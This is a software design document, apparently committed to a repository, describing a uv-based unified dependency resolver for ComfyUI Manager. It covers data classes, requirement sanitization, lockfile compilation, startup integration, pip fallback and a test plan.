MC["manager_core.py<br/>execute_install_script() — 2 locations"]
|
||||
MC -->|"use_unified_resolver=True"| SKIP["Skip per-node pip install<br/>(deps deferred to restart)"]
|
||||
MC -->|"use_unified_resolver=False"| PIP["Existing pip install loop"]
|
||||
SKIP --> INST["Run install.py"]
|
||||
PIP --> INST
|
||||
end
|
||||
|
||||
subgraph STARTUP["ComfyUI Restart (prestartup_script.py)"]
|
||||
CHK{use_unified_resolver?}
|
||||
CHK -->|Yes| UDR
|
||||
CHK -->|No| LAZY["execute_lazy_install_script()<br/>per-node pip install (existing)"]
|
||||
|
||||
subgraph UDR["UnifiedDepResolver (batch)"]
|
||||
S1["1. collect_requirements()<br/>(ALL installed node packs)"]
|
||||
S2["2. compile_lockfile()"]
|
||||
S3["3. install_from_lockfile()"]
|
||||
S1 --> S2 --> S3
|
||||
end
|
||||
|
||||
UDR -->|Success| FIX["PIPFixer.fix_broken()"]
|
||||
UDR -->|Failure| LAZY
|
||||
LAZY --> FIX2["PIPFixer.fix_broken()"]
|
||||
end
|
||||
```
|
||||
|
||||
> **Key design change**: The unified resolver runs at **startup time** (module scope), not at install time.
|
||||
> At install time, `execute_install_script()` skips the pip loop when unified mode is active.
|
||||
> At startup, `prestartup_script.py` runs the resolver at module scope — unconditionally when enabled,
|
||||
> independent of `install-scripts.txt` existence. Blacklist/overrides/downgrade_blacklist are bypassed
|
||||
> (empty values passed); `uv pip compile` handles all conflict resolution natively.
|
||||
>
|
||||
> **Note**: `execute_install_script()` exists in 2 locations in the codebase (excluding legacy module).
|
||||
> - `UnifiedManager.execute_install_script()` (class method): Used for CNR installs, etc.
|
||||
> - Standalone function `execute_install_script()`: Used for updates, git installs, etc.
|
||||
> Both skip per-node pip install when unified mode is active.
|
||||
|
||||
### 1.3 uv Command Strategy
|
||||
|
||||
**`uv pip compile`** → Generates pinned requirements.txt (pip-compatible)
|
||||
- Do not confuse with `uv lock`
|
||||
- `uv lock` generates `uv.lock` (TOML) — cross-platform but incompatible with pip workflows
|
||||
- This design uses a pip-compatible workflow (`uv pip compile` → `uv pip install -r`)
|
||||
|
||||
**`uv pip install -r`** ← Used instead of `uv pip sync`
|
||||
- `uv pip sync`: **Deletes** packages not in lockfile → Risk of removing torch, ComfyUI deps
|
||||
- `uv pip install -r`: Only performs additive installs, preserves existing packages → Safe
|
||||
|
||||
---
|
||||
|
||||
## 2. Class Design
|
||||
|
||||
### 2.1 UnifiedDepResolver
|
||||
|
||||
```python
|
||||
class UnifiedDepResolver:
|
||||
"""
|
||||
Unified dependency resolver.
|
||||
|
||||
Resolves and installs all dependencies of (installed node packs + new node packs)
|
||||
at once using uv.
|
||||
|
||||
Responsibility scope: Dependency resolution and installation only.
|
||||
install.py execution and PIPFixer calls are handled by the caller (manager_core).
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
node_pack_paths: list[str],
|
||||
base_requirements: list[str] | None = None,
|
||||
blacklist: set[str] | None = None,
|
||||
overrides: dict[str, str] | None = None,
|
||||
downgrade_blacklist: list[str] | None = None,
|
||||
):
|
||||
"""
|
||||
Args:
|
||||
node_pack_paths: List of node pack directory paths
|
||||
base_requirements: Base dependencies (ComfyUI requirements, etc.)
|
||||
blacklist: Blacklisted package set (default: empty set; not applied in v1 unified mode)
|
||||
overrides: Package name remapping dict (default: empty dict; not applied in v1 unified mode)
|
||||
downgrade_blacklist: Downgrade-prohibited package list (default: empty list; not applied in v1 unified mode)
|
||||
"""
|
||||
|
||||
def resolve_and_install(self) -> ResolveResult:
|
||||
"""Execute full pipeline: stale cleanup → collect → compile → install.
|
||||
Calls cleanup_stale_tmp() at start to clean up residual files from previous abnormal terminations."""
|
||||
|
||||
def collect_requirements(self) -> CollectedDeps:
|
||||
"""Collect dependencies from all node packs"""
|
||||
|
||||
def compile_lockfile(self, deps: CollectedDeps) -> LockfileResult:
|
||||
"""Generate pinned requirements via uv pip compile"""
|
||||
|
||||
def install_from_lockfile(self, lockfile_path: str) -> InstallResult:
|
||||
"""Install from pinned requirements (uv pip install -r)"""
|
||||
```
|
||||
|
||||
### 2.2 Data Classes
|
||||
|
||||
```python
|
||||
@dataclass
|
||||
class PackageRequirement:
|
||||
"""Individual package dependency"""
|
||||
name: str # Package name (normalized)
|
||||
spec: str # Original spec (e.g., "torch>=2.0")
|
||||
source: str # Source node pack path
|
||||
|
||||
@dataclass
|
||||
class CollectedDeps:
|
||||
"""All collected dependencies"""
|
||||
requirements: list[PackageRequirement] # Collected deps (duplicates allowed, uv resolves)
|
||||
skipped: list[tuple[str, str]] # (package_name, skip_reason)
|
||||
sources: dict[str, list[str]] # {package_name: [source_node_packs]}
|
||||
extra_index_urls: list[str] # Additional index URLs separated from --index-url entries
|
||||
|
||||
@dataclass
|
||||
class LockfileResult:
|
||||
"""Compilation result"""
|
||||
success: bool
|
||||
lockfile_path: str | None # pinned requirements.txt path
|
||||
conflicts: list[str] # Conflict details
|
||||
stderr: str # uv error output
|
||||
|
||||
@dataclass
|
||||
class InstallResult:
|
||||
"""Installation result (uv pip install -r is atomic: all-or-nothing)"""
|
||||
success: bool
|
||||
installed: list[str] # Installed packages (stdout parsing)
|
||||
skipped: list[str] # Already installed (stdout parsing)
|
||||
stderr: str # uv stderr output (for failure analysis)
|
||||
|
||||
@dataclass
|
||||
class ResolveResult:
|
||||
"""Full pipeline result"""
|
||||
success: bool
|
||||
collected: CollectedDeps | None
|
||||
lockfile: LockfileResult | None
|
||||
install: InstallResult | None
|
||||
error: str | None
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Core Logic Details
|
||||
|
||||
### 3.1 Dependency Collection (`collect_requirements`)
|
||||
|
||||
```python
|
||||
# Input sanitization: dangerous patterns to reject
|
||||
_DANGEROUS_PATTERNS = re.compile(
|
||||
r'^(-r\b|--requirement\b|-e\b|--editable\b|-c\b|--constraint\b'
|
||||
r'|--find-links\b|-f\b|.*@\s*file://)',
|
||||
re.IGNORECASE
|
||||
)
|
||||
|
||||
def collect_requirements(self) -> CollectedDeps:
|
||||
requirements = []
|
||||
skipped = []
|
||||
sources = defaultdict(list)
|
||||
extra_index_urls = []
|
||||
|
||||
for path in self.node_pack_paths:
|
||||
# Exclude disabled node packs (directory-based mechanism)
|
||||
# Disabled node packs are actually moved to custom_nodes/.disabled/,
|
||||
# so they should already be excluded from input at this point.
|
||||
# Defensive check: new style (.disabled/ directory) + old style ({name}.disabled suffix)
|
||||
if ('/.disabled/' in path
|
||||
or os.path.basename(os.path.dirname(path)) == '.disabled'
|
||||
or path.rstrip('/').endswith('.disabled')):
|
||||
continue
|
||||
|
||||
req_file = os.path.join(path, "requirements.txt")
|
||||
if not os.path.exists(req_file):
|
||||
continue
|
||||
|
||||
# chardet-based encoding detection (existing robust_readlines pattern)
|
||||
for line in self._read_requirements(req_file):
|
||||
line = line.split('#')[0].strip()
|
||||
if not line:
|
||||
continue
|
||||
|
||||
# 0. Input sanitization (security)
|
||||
if self._DANGEROUS_PATTERNS.match(line):
|
||||
skipped.append((line, f"rejected: dangerous pattern in {path}"))
|
||||
logging.warning(f"[UnifiedDepResolver] rejected dangerous line: '{line}' from {path}")
|
||||
continue
|
||||
|
||||
# 1. Separate --index-url / --extra-index-url handling
|
||||
# (BEFORE path separator check, because URLs contain '/')
|
||||
if '--index-url' in line or '--extra-index-url' in line:
|
||||
pkg_spec, index_url = self._split_index_url(line)
|
||||
if index_url:
|
||||
extra_index_urls.append(index_url)
|
||||
line = pkg_spec
|
||||
if not line:
|
||||
# Standalone option line (no package prefix)
|
||||
continue
|
||||
|
||||
# 1b. Reject path separators in package name portion
|
||||
pkg_name_part = re.split(r'[><=!~;]', line)[0]
|
||||
if '/' in pkg_name_part or '\\' in pkg_name_part:
|
||||
skipped.append((line, f"rejected: path separator in package name"))
|
||||
continue
|
||||
|
||||
# 2. Apply remap_pip_package (using cm_global.pip_overrides)
|
||||
pkg_spec = self._remap_package(line)
|
||||
|
||||
# 3. Blacklist check (cm_global.pip_blacklist)
|
||||
pkg_name = self._extract_package_name(pkg_spec)
|
||||
if pkg_name in self.blacklist:
|
||||
skipped.append((pkg_spec, "blacklisted"))
|
||||
continue
|
||||
|
||||
# 4. Downgrade blacklist check (includes version comparison)
|
||||
if self._is_downgrade_blacklisted(pkg_name, pkg_spec):
|
||||
skipped.append((pkg_spec, "downgrade blacklisted"))
|
||||
continue
|
||||
|
||||
# 5. Collect (no dedup — uv handles resolution)
|
||||
req = PackageRequirement(
|
||||
name=pkg_name,
|
||||
spec=pkg_spec,
|
||||
source=path,
|
||||
)
|
||||
requirements.append(req)
|
||||
sources[pkg_name].append(path)
|
||||
|
||||
return CollectedDeps(
|
||||
requirements=requirements,
|
||||
skipped=skipped,
|
||||
sources=dict(sources),
|
||||
extra_index_urls=list(set(extra_index_urls)), # Deduplicate
|
||||
)
|
||||
|
||||
def _split_index_url(self, line: str) -> tuple[str, str | None]:
|
||||
"""Split 'package_name --index-url URL' → (package_name, URL).
|
||||
|
||||
Also handles standalone ``--index-url URL`` and
|
||||
``--extra-index-url URL`` lines (with no package prefix).
|
||||
"""
|
||||
# Handle --extra-index-url first (contains '-index-url' as substring
|
||||
# but NOT '--index-url' due to the extra-index prefix)
|
||||
for option in ('--extra-index-url', '--index-url'):
|
||||
if option in line:
|
||||
parts = line.split(option, 1)
|
||||
pkg_spec = parts[0].strip()
|
||||
url = parts[1].strip() if len(parts) == 2 else None
|
||||
return pkg_spec, url
|
||||
return line, None
|
||||
|
||||
def _is_downgrade_blacklisted(self, pkg_name: str, pkg_spec: str) -> bool:
|
||||
"""Reproduce the downgrade version comparison from existing is_blacklisted() logic.
|
||||
|
||||
Same logic as manager_core.py's is_blacklisted():
|
||||
- No version spec and already installed → block (prevent reinstall)
|
||||
- Operator is one of ['<=', '==', '<', '~='] and
|
||||
installed version >= requested version → block (prevent downgrade)
|
||||
- Version comparison uses manager_util.StrictVersion (NOT packaging.version)
|
||||
"""
|
||||
if pkg_name not in self.downgrade_blacklist:
|
||||
return False
|
||||
|
||||
installed_packages = manager_util.get_installed_packages()
|
||||
|
||||
# Version spec parsing (same pattern as existing is_blacklisted())
|
||||
pattern = r'([^<>!~=]+)([<>!~=]=?)([^ ]*)'
|
||||
match = re.search(pattern, pkg_spec)
|
||||
|
||||
if match is None:
|
||||
# No version spec: prevent reinstall if already installed
|
||||
if pkg_name in installed_packages:
|
||||
return True
|
||||
elif match.group(2) in ['<=', '==', '<', '~=']:
|
||||
# Downgrade operator: block if installed version >= requested version
|
||||
if pkg_name in installed_packages:
|
||||
try:
|
||||
installed_ver = manager_util.StrictVersion(installed_packages[pkg_name])
|
||||
requested_ver = manager_util.StrictVersion(match.group(3))
|
||||
if installed_ver >= requested_ver:
|
||||
return True
|
||||
except (ValueError, TypeError):
|
||||
logging.warning(f"[UnifiedDepResolver] version parse failed: {pkg_spec}")
|
||||
return False
|
||||
|
||||
return False
|
||||
|
||||
def _remap_package(self, pkg: str) -> str:
|
||||
"""Package name remapping based on cm_global.pip_overrides.
|
||||
Reuses existing remap_pip_package() logic."""
|
||||
if pkg in self.overrides:
|
||||
remapped = self.overrides[pkg]
|
||||
logging.info(f"[UnifiedDepResolver] '{pkg}' remapped to '{remapped}'")
|
||||
return remapped
|
||||
return pkg
|
||||
```
|
||||
|
||||
### 3.2 Lockfile Generation (`compile_lockfile`)
|
||||
|
||||
**Behavior:**
|
||||
1. Create a unique temp directory (`tempfile.mkdtemp(prefix="comfyui_resolver_")`) for concurrency safety
|
||||
2. Write collected requirements and base constraints to temp files
|
||||
3. Execute `uv pip compile` with options:
|
||||
- `--output-file` (pinned requirements path within temp dir)
|
||||
- `--python` (current interpreter)
|
||||
- `--constraint` (base dependencies)
|
||||
- `--extra-index-url` (from `CollectedDeps.extra_index_urls`, logged via `_redact_url()`)
|
||||
4. Timeout: 300s — returns `LockfileResult(success=False)` on `TimeoutExpired`
|
||||
5. On `returncode != 0`: parse stderr for conflict details via `_parse_conflicts()`
|
||||
6. Post-success verification: confirm lockfile was actually created (handles edge case of `returncode==0` without output)
|
||||
7. Temp directory cleanup: `shutil.rmtree()` in `except` block; on success, caller (`resolve_and_install`'s `finally`) handles cleanup
|
||||
|
||||
### 3.3 Dependency Installation (`install_from_lockfile`)
|
||||
|
||||
**Behavior:**
|
||||
1. Execute `uv pip install --requirement <lockfile_path> --python <sys.executable>`
|
||||
- **NOT `uv pip sync`** — sync deletes packages not in lockfile (dangerous for torch, ComfyUI deps)
|
||||
2. `uv pip install -r` is **atomic** (all-or-nothing): no partial failure
|
||||
3. Timeout: 600s — returns `InstallResult(success=False)` on `TimeoutExpired`
|
||||
4. On success: parse stdout via `_parse_install_output()` to populate `installed`/`skipped` lists
|
||||
5. On failure: `stderr` captures the failure cause; `installed=[]` (atomic model)
|
||||
|
||||
### 3.4 uv Command Resolution
|
||||
|
||||
**`_get_uv_cmd()` resolution order** (mirrors existing `get_pip_cmd()` pattern):
|
||||
1. **Module uv**: `[sys.executable, '-m', 'uv']` (with `-s` flag for embedded Python — note: `python_embeded` spelling is intentional, matching ComfyUI Windows distribution path)
|
||||
2. **Standalone uv**: `['uv']` via `shutil.which('uv')`
|
||||
3. **Not found**: raises `UvNotAvailableError` → caught by caller for pip fallback
|
||||
|
||||
### 3.5 Stale Temp File Cleanup
|
||||
|
||||
**`cleanup_stale_tmp(max_age_seconds=3600)`** — classmethod, called at start of `resolve_and_install()`:
|
||||
- Scans `tempfile.gettempdir()` for directories with prefix `comfyui_resolver_`
|
||||
- Deletes directories older than `max_age_seconds` (default: 1 hour)
|
||||
- Silently ignores `OSError` (permission issues, etc.)
|
||||
|
||||
### 3.6 Credential Redaction
|
||||
|
||||
```python
|
||||
_CREDENTIAL_PATTERN = re.compile(r'://([^@]+)@')
|
||||
|
||||
def _redact_url(self, url: str) -> str:
|
||||
"""Mask authentication info in URLs. user:pass@host → ****@host"""
|
||||
return self._CREDENTIAL_PATTERN.sub('://****@', url)
|
||||
```
|
||||
|
||||
All `--extra-index-url` logging passes through `_redact_url()`:
|
||||
```python
|
||||
# Logging example within compile_lockfile()
|
||||
for url in deps.extra_index_urls:
|
||||
logging.info(f"[UnifiedDepResolver] extra-index-url: {self._redact_url(url)}")
|
||||
cmd += ["--extra-index-url", url] # Original URL passed to actual command
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Existing Code Integration
|
||||
|
||||
### 4.1 manager_core.py Modification Points
|
||||
|
||||
**2 `execute_install_script()` locations — both skip deps in unified mode:**
|
||||
|
||||
#### 4.1.1 UnifiedManager.execute_install_script() (Class Method)
|
||||
|
||||
#### 4.1.2 Standalone Function execute_install_script()
|
||||
|
||||
**Both locations use the same pattern when unified mode is active:**
|
||||
|
||||
1. `lazy_mode=True` → schedule and return early (unchanged)
|
||||
2. If `not no_deps and manager_util.use_unified_resolver`:
|
||||
- **Skip** the `requirements.txt` pip install loop entirely (deps deferred to startup)
|
||||
- Log: `"[UnifiedDepResolver] deps deferred to startup batch resolution"`
|
||||
3. If `not manager_util.use_unified_resolver`: existing pip install loop runs (unchanged)
|
||||
4. `install.py` execution: **always runs immediately** regardless of resolver mode
|
||||
|
||||
> **Parameter ordering differs:**
|
||||
> - Method: `(self, url, repo_path, instant_execution, lazy_mode, no_deps)`
|
||||
> - Standalone: `(url, repo_path, lazy_mode, instant_execution, no_deps)`
|
||||
|
||||
### 4.1.3 Startup Batch Resolver (`prestartup_script.py`)
|
||||
|
||||
**New**: Runs unified resolver at **module scope** — unconditionally when enabled, independent of `install-scripts.txt` existence.
|
||||
|
||||
**Execution point**: After config reading and `cm_global` initialization, **before** the `execute_startup_script()` gate.
|
||||
|
||||
**Logic** (uses module-level helpers from `unified_dep_resolver.py`):
|
||||
1. `collect_node_pack_paths(folder_paths.get_folder_paths('custom_nodes'))` — enumerate all installed node pack directories
|
||||
2. `collect_base_requirements(comfy_path)` — read `requirements.txt` + `manager_requirements.txt` from ComfyUI root (base deps only)
|
||||
3. Create `UnifiedDepResolver` with **empty** blacklist/overrides/downgrade_blacklist (uv handles resolution natively; interface preserved for extensibility)
|
||||
4. Call `resolve_and_install()` → on success set `_unified_resolver_succeeded = True`
|
||||
5. On failure (including `UvNotAvailableError`): log warning, fall back to per-node pip
|
||||
|
||||
> `manager_requirements.txt` is read **only** from `comfy_path` (ComfyUI base), never from node packs.
|
||||
> Node packs' `requirements.txt` are collected by the resolver's `collect_requirements()` method.
|
||||
|
||||
### 4.1.4 `execute_lazy_install_script()` Modification
|
||||
|
||||
When unified resolver **succeeds**, `execute_lazy_install_script()` skips the per-node pip install loop
|
||||
(deps already batch-resolved at module scope). `install.py` still runs per node pack.
|
||||
|
||||
```python
|
||||
# In execute_lazy_install_script():
|
||||
if os.path.exists(requirements_path) and not _unified_resolver_succeeded:
|
||||
# Per-node pip install: only runs if unified resolver is disabled or failed
|
||||
...
|
||||
# install.py always runs regardless
|
||||
```
|
||||
|
||||
> **Note**: Gated on `_unified_resolver_succeeded` (success flag), NOT `use_unified_resolver` (enable flag).
|
||||
> If the resolver is enabled but fails, `_unified_resolver_succeeded` remains False → per-node pip runs as fallback.
|
||||
|
||||
### 4.2 Configuration Addition (config.ini)
|
||||
|
||||
```ini
|
||||
[default]
|
||||
# Existing settings...
|
||||
use_unified_resolver = false # Enable unified dependency resolution
|
||||
```
|
||||
|
||||
### 4.3 Configuration Reading
|
||||
|
||||
Follows the existing `read_uv_mode()` / `use_uv` pattern:
|
||||
- `prestartup_script.py`: `read_unified_resolver_mode()` reads from `default_conf` → sets `manager_util.use_unified_resolver`
|
||||
- `manager_core.py`: `read_config()` / `write_config()` / `get_config()` include `use_unified_resolver` key
|
||||
- `read_config()` exception fallback must include `use_unified_resolver` key to prevent `KeyError` in `write_config()`
|
||||
|
||||
### 4.4 manager_util.py Extension
|
||||
|
||||
```python
|
||||
# manager_util.py
|
||||
use_unified_resolver = False # New global flag (separate from use_uv)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Error Handling Strategy
|
||||
|
||||
```mermaid
|
||||
flowchart TD
|
||||
STARTUP["prestartup_script.py startup"]
|
||||
STARTUP --> CHK{use_unified_resolver?}
|
||||
CHK -->|No| SKIP_UDR["Skip → execute_lazy_install_script per-node pip"]
|
||||
|
||||
CHK -->|Yes| RAI["run_unified_resolver()"]
|
||||
RAI --> STALE["cleanup_stale_tmp()<br/>Clean stale temp dirs (>1 hour old)"]
|
||||
STALE --> UV_CHK{uv installed?}
|
||||
UV_CHK -->|No| UV_ERR["UvNotAvailableError<br/>→ Fallback: execute_lazy_install_script per-node pip"]
|
||||
|
||||
UV_CHK -->|Yes| CR["collect_requirements()<br/>(ALL installed node packs)"]
|
||||
CR --> CR_DIS[".disabled/ path → auto-skip"]
|
||||
CR --> CR_PARSE["Parse failure → skip node pack, continue"]
|
||||
CR --> CR_ENC["Encoding detection failure → assume UTF-8"]
|
||||
CR --> CR_DANGER["Dangerous pattern detected → reject line + log"]
|
||||
CR --> CR_DG["Downgrade blacklist → skip after version comparison"]
|
||||
|
||||
CR --> CL["compile_lockfile()"]
|
||||
CL --> CL_CONFLICT["Conflict → report + per-node pip fallback"]
|
||||
CL --> CL_TIMEOUT["TimeoutExpired 300s → per-node pip fallback"]
|
||||
CL --> CL_NOFILE["Lockfile not created → failure + fallback"]
|
||||
CL --> CL_TMP["Temp directory → finally block cleanup"]
|
||||
|
||||
CL -->|Success| IL["install_from_lockfile()"]
|
||||
IL --> IL_OK["Total success → parse installed/skipped"]
|
||||
IL --> IL_FAIL["Total failure → stderr + per-node pip fallback (atomic)"]
|
||||
IL --> IL_TIMEOUT["TimeoutExpired 600s → fallback"]
|
||||
|
||||
IL_OK --> PF["PIPFixer.fix_broken()<br/>Restore torch/opencv/frontend"]
|
||||
PF --> LAZY["execute_lazy_install_script()<br/>(install.py only, deps skipped)"]
|
||||
```
|
||||
|
||||
> **Fallback model**: On resolver failure at startup, `execute_lazy_install_script()` runs normally
|
||||
> (per-node pip install), providing the same behavior as if unified mode were disabled.
|
||||
|
||||
---
|
||||
|
||||
## 6. File Structure
|
||||
|
||||
### 6.1 New Files
|
||||
|
||||
```
|
||||
comfyui_manager/common/unified_dep_resolver.py # Main module (~350 lines, includes sanitization/downgrade logic)
|
||||
tests/test_unified_dep_resolver.py # Unit tests
|
||||
```
|
||||
|
||||
### 6.2 Modified Files
|
||||
|
||||
```
|
||||
comfyui_manager/glob/manager_core.py # Skip per-node pip in unified mode (2 execute_install_script locations)
|
||||
comfyui_manager/common/manager_util.py # Add use_unified_resolver flag
|
||||
comfyui_manager/prestartup_script.py # Config reading + startup batch resolver + execute_lazy_install_script modification
|
||||
```
|
||||
|
||||
> **Not modified**: `comfyui_manager/legacy/manager_core.py` (legacy paths retain existing pip behavior)
|
||||
|
||||
---
|
||||
|
||||
## 7. Dependencies
|
||||
|
||||
| Dependency | Purpose | Notes |
|
||||
|-----------|---------|-------|
|
||||
| `uv` | Dependency resolution and installation | Already included in project dependencies |
|
||||
| `cm_global` | pip_overrides, pip_blacklist, pip_downgrade_blacklist | Reuse existing global state (runtime dynamic assignment) |
|
||||
| `manager_util` | StrictVersion, get_installed_packages, use_unified_resolver flag | Reuse existing utilities |
|
||||
| `tempfile` | Temporary requirements files, mkdtemp | Standard library |
|
||||
| `subprocess` | uv process execution | Standard library |
|
||||
| `dataclasses` | Result data structures | Standard library |
|
||||
| `re` | Input sanitization, version spec parsing, credential redaction | Standard library |
|
||||
| `shutil` | uv lookup (`which`), temp directory cleanup | Standard library |
|
||||
| `time` | Stale temp file age calculation | Standard library |
|
||||
| `logging` | Per-step logging | Standard library |
|
||||
|
||||
No additional external dependencies.
|
||||
|
||||
---
|
||||
|
||||
## 8. Sequence Diagram
|
||||
|
||||
### Install Time + Startup Batch Resolution
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
actor User
|
||||
participant MC as manager_core
|
||||
participant PS as prestartup_script
|
||||
participant UDR as UnifiedDepResolver
|
||||
participant UV as uv (CLI)
|
||||
|
||||
Note over User,MC: Install Time (immediate)
|
||||
User->>MC: Install node pack X
|
||||
MC->>MC: Git clone / download X
|
||||
MC->>MC: Skip per-node pip (unified mode)
|
||||
MC->>MC: Run X's install.py
|
||||
MC-->>User: Node pack installed (deps pending)
|
||||
|
||||
Note over User,UV: ComfyUI Restart
|
||||
User->>PS: Start ComfyUI
|
||||
PS->>PS: Check use_unified_resolver
|
||||
PS->>UDR: Create resolver (module scope)
|
||||
UDR->>UDR: collect_requirements()<br/>(ALL installed node packs)
|
||||
UDR->>UV: uv pip compile --output-file
|
||||
UV-->>UDR: pinned reqs.txt
|
||||
UDR->>UV: uv pip install -r
|
||||
UV-->>UDR: Install result
|
||||
UDR-->>PS: ResolveResult(success=True)
|
||||
PS->>PS: PIPFixer.fix_broken()
|
||||
PS->>PS: execute_lazy_install_script()<br/>(install.py only, deps skipped)
|
||||
PS-->>User: ComfyUI ready
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 9. Test Strategy
|
||||
|
||||
### 9.1 Unit Tests
|
||||
|
||||
| Test Target | Cases |
|
||||
|------------|-------|
|
||||
| `collect_requirements` | Normal parsing, empty file, blacklist filtering, comment handling, remap application |
|
||||
| `.disabled` filtering | Exclude node packs within `.disabled/` directory path (directory-based mechanism) |
|
||||
| Input sanitization | Reject lines with `-r`, `-e`, `--find-links`, `@ file://`, path separators |
|
||||
| `--index-url` / `--extra-index-url` separation | `package --index-url URL`, standalone `--index-url URL`, standalone `--extra-index-url URL`, `package --extra-index-url URL` → package spec + extra_index_urls separation |
|
||||
| Downgrade blacklist | Installed + lower version request → skip, not installed → pass, same/higher version → pass |
|
||||
| `compile_lockfile` | Normal compilation, conflict detection, TimeoutExpired, constraint application, --output-file verification |
|
||||
| Lockfile existence verification | Failure handling when file not created despite returncode==0 |
|
||||
| `extra_index_urls` passthrough | Verify `--extra-index-url` argument included in compile command |
|
||||
| `install_from_lockfile` | Normal install, total failure, TimeoutExpired |
|
||||
| Atomic model | On failure: installed=[], stderr populated |
|
||||
| `_get_uv_cmd` | Module uv, standalone uv, embedded python (`python_embeded`), not installed |
|
||||
| `_remap_package` | pip_overrides remapping, unregistered packages |
|
||||
| Blacklist | torch family, torchsde, custom blacklist |
|
||||
| Duplicate handling | Same package with multiple specs → all passed to uv |
|
||||
| Multiple paths | Collection from multiple custom_nodes paths |
|
||||
| `cm_global` defense | Default values used when `pip_blacklist` etc. not assigned |
|
||||
| Concurrency | Two resolver instances each use unique temp directories |
|
||||
| Credential redaction | `user:pass@host` URL masked in log output |
|
||||
| `_redact_url` | `://user:pass@host` → `://****@host` conversion, no-credential URL passthrough |
|
||||
| `cleanup_stale_tmp` | Delete stale dirs >1 hour, preserve recent dirs, ignore permission errors |
|
||||
| Downgrade operators | `<=`, `==`, `<`, `~=` blocked; `>=`, `>`, `!=` pass; no spec + installed → blocked |
|
||||
| `StrictVersion` comparison | Verify `manager_util.StrictVersion` is used (not `packaging.version`) |
|
||||
|
||||
### 9.2 Integration Tests
|
||||
|
||||
- End-to-end test in real uv environment
|
||||
- Existing pip fallback path test
|
||||
- config.ini setting toggle test
|
||||
- Environment integrity verification after PIPFixer call
|
||||
- lazy_mode scheduling behavior verification (Windows simulation)
|
||||
- `use_uv=False` + `use_unified_resolver=True` combination test
|
||||
- Large-scale dependency (50+ node packs) performance test
|
||||
|
||||
---
|
||||
|
||||
## 10. Implementation Order
|
||||
|
||||
1. **Phase 1**: Data classes and `collect_requirements` implementation + tests
|
||||
- PackageRequirement, CollectedDeps (including extra_index_urls) and other data classes
|
||||
- Blacklist/override filtering
|
||||
- **Downgrade blacklist** (version comparison logic included)
|
||||
- **Input sanitization** (-r, -e, @ file:// etc. rejection)
|
||||
- **`--index-url` / `--extra-index-url` separation handling** (package spec + extra_index_urls)
|
||||
- **`.disabled` node pack filtering**
|
||||
- Defensive cm_global access (getattr pattern)
|
||||
2. **Phase 2**: `compile_lockfile` implementation + tests
|
||||
- uv pip compile invocation
|
||||
- --output-file, --constraint, --python options
|
||||
- Conflict parsing logic
|
||||
3. **Phase 3**: `install_from_lockfile` implementation + tests
|
||||
- uv pip install -r invocation (NOT sync)
|
||||
- Install result parsing
|
||||
4. **Phase 4**: Integration — startup batch + install-time skip
|
||||
- `prestartup_script.py`: Module-scope startup batch resolver + `execute_lazy_install_script()` deps skip
|
||||
- `manager_core.py`: Skip per-node pip in 2 `execute_install_script()` locations
|
||||
- `manager_util.py`: `use_unified_resolver` flag
|
||||
- Config reading (`read_unified_resolver_mode()`, `read_config()`/`write_config()`)
|
||||
5. **Phase 5**: Integration tests + fallback verification + startup batch tests
|
||||
|
||||
---
|
||||
|
||||
## Appendix A: Existing Code Reference
|
||||
|
||||
> **Note**: Line numbers may shift as code changes, so references use symbol names (function/class names).
|
||||
> Use `grep -n` or IDE symbol search for exact locations.
|
||||
|
||||
### remap_pip_package Location (Code Duplication Exists)
|
||||
|
||||
```
|
||||
comfyui_manager/glob/manager_core.py — def remap_pip_package(pkg)
|
||||
comfyui_manager/prestartup_script.py — def remap_pip_package(pkg)
|
||||
```
|
||||
|
||||
Both reference `cm_global.pip_overrides` with identical logic.
|
||||
The unified resolver uses `cm_global.pip_overrides` directly to avoid adding more duplication.
|
||||
|
||||
### cm_global Global State
|
||||
|
||||
```python
|
||||
# Dynamically assigned in prestartup_script.py (NOT defined in cm_global.py!)
|
||||
cm_global.pip_blacklist = {'torch', 'torchaudio', 'torchsde', 'torchvision'} # set
|
||||
cm_global.pip_overrides = {} # dict, loaded from JSON
|
||||
cm_global.pip_downgrade_blacklist = [ # list
|
||||
'torch', 'torchaudio', 'torchsde', 'torchvision',
|
||||
'transformers', 'safetensors', 'kornia'
|
||||
]
|
||||
```
|
||||
|
||||
> **cm_cli path**: `cm_cli/__main__.py` also independently initializes these attributes.
|
||||
> If the resolver may be called from the CLI path, this initialization should also be verified.
|
||||
|
||||
### PIPFixer Call Pattern
|
||||
|
||||
```python
|
||||
# Within UnifiedManager.execute_install_script() method in manager_core.py:
|
||||
pip_fixer = manager_util.PIPFixer(
|
||||
manager_util.get_installed_packages(),
|
||||
context.comfy_path,
|
||||
context.manager_files_path
|
||||
)
|
||||
# ... (after installation)
|
||||
pip_fixer.fix_broken()
|
||||
```
|
||||
|
||||
The unified resolver does not call PIPFixer directly.
|
||||
The caller (execute_install_script) calls PIPFixer as part of the existing flow.
|
||||
|
||||
### is_blacklisted() Logic (Must Be Reproduced in Unified Resolver)
|
||||
|
||||
```python
|
||||
# manager_core.py — def is_blacklisted(name)
|
||||
# 1. Simple pip_blacklist membership check
|
||||
# 2. pip_downgrade_blacklist version comparison:
|
||||
# - Parse spec with regex r'([^<>!~=]+)([<>!~=]=?)([^ ]*)'
|
||||
# - match is None (no version spec) + installed → block
|
||||
# - Operator in ['<=', '==', '<', '~='] + installed version >= requested version → block
|
||||
# - Version comparison uses manager_util.StrictVersion (NOT packaging.version)
|
||||
```
|
||||
|
||||
The unified resolver's `_is_downgrade_blacklisted()` method faithfully reproduces this logic.
|
||||
It uses `manager_util.StrictVersion` instead of `packaging.version.parse()` to ensure consistency with existing behavior.
|
||||
|
||||
### Existing Code --index-url Handling (Asymmetric)
|
||||
|
||||
```python
|
||||
# Only exists in standalone function execute_install_script():
|
||||
if '--index-url' in package_name:
|
||||
s = package_name.split('--index-url')
|
||||
install_cmd = manager_util.make_pip_cmd(["install", s[0].strip(), '--index-url', s[1].strip()])
|
||||
|
||||
# UnifiedManager.execute_install_script() method does NOT have this handling
|
||||
```
|
||||
|
||||
The unified resolver unifies both paths for consistent handling via `_split_index_url()`.
|
||||
355
docs/dev/PRD-unified-dependency-resolver.md
Normal file
355
